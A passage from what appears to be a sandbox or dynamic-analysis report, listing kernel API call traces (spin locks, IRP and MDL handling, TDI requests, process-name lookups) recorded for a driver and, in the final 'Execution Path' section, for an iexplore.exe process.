| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003f81ed90, Irp_unk_out = 0xffffe0003f81ed90, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c80d010, Irp_unk_out = 0xffffe0003c80d010, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd000339f4570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd000339f4528, Handle_out = 0xffffffff80000cc4, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cc4, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cc4, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cc4, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fec |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a763a6c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000339f4370, ret_val_unk_out = 0xffffe0003c8399d0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c8399d0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c8399d0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd000339f4570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd000339f4528, Handle_out = 0xffffffff80000c80, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000c80, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000c80, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd000339f4520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000c80, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47feb |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000339f4370, ret_val_unk_out = 0xffffe0003c8399d0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c8399d0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c8399d0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0004ece08d0, Irp_unk_out = 0xffffe0004ece08d0, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7886f4, SpinLock_unk_out = 0xffffe0003a7886f4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7886f4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7886f4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
Execution Path #149 (length: 18, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 18 |
Processes
»
| Process | Count |
|---|---|
| Process 42 (iexplore.exe, PID: 556) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
